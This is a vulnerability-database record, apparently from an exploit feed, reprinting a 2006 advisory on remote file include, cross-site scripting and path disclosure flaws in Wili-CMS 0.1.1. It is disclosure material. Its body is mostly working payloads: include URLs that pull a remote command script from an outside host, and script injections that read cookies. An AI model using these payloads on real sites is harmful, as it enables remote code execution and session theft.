Description
No description provided by source.
{"type": "seebug", "viewCount": 3, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "reporter": "Root", "title": "Wili-CMS <= 0.1.1 (include/xss/full path) Remote Vulnerabilities", "cvelist": [], "bulletinFamily": "exploit", "sourceHref": "https://www.seebug.org/vuldb/ssvid-64011", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "href": "https://www.seebug.org/vuldb/ssvid-64011", "id": "SSV:64011", "status": "cve,poc", "lastseen": "2017-11-19T13:32:17", "sourceData": "\n Wili-CMS Multiple Input Validation Vulnerabilities\r\n\r\nDiscovered By : HACKERS PAL\r\nCopy rights : HACKERS PAL\r\nWebsite : http://www.soqor.net\r\nEmail Address : security@soqor.net\r\n\r\n\r\nRemote include\r\nexample-view/templates/article.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?\r\nexample-view/templates/root.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?\r\nexample-view/templates/dates_list.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?\r\n\r\n\r\nXss\r\nhttp://localhost/vul/wili-cms/relocate.php?<script>alert(document.cookie);</script>\r\nhttp://localhost/vul/wili-cms/example-view/inc/print_button.php?globals[pageid]="><script>alert(document.cookie);</script>\r\n\r\n\r\nFull path\r\nthumbnail.php?filename=global_variables.php\r\nfunctions/admin/all.php\r\nfunctions/admin/init_session.php\r\nfunctions/all.php\r\nexample-view/admin_templates/ any_file.php\r\n\r\nand many other Xss and Full path vulnerabilities\r\n#WwW.SoQoR.NeT\r\n\r\n# milw0rm.com [2006-09-21]\r\n\n ", "published": "2014-07-01T00:00:00", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647490179, "score": 1659785532, "epss": 1678848988}}
{}
Wili-CMS <= 0.1.1 (include/xss/full path) Remote Vulnerabilities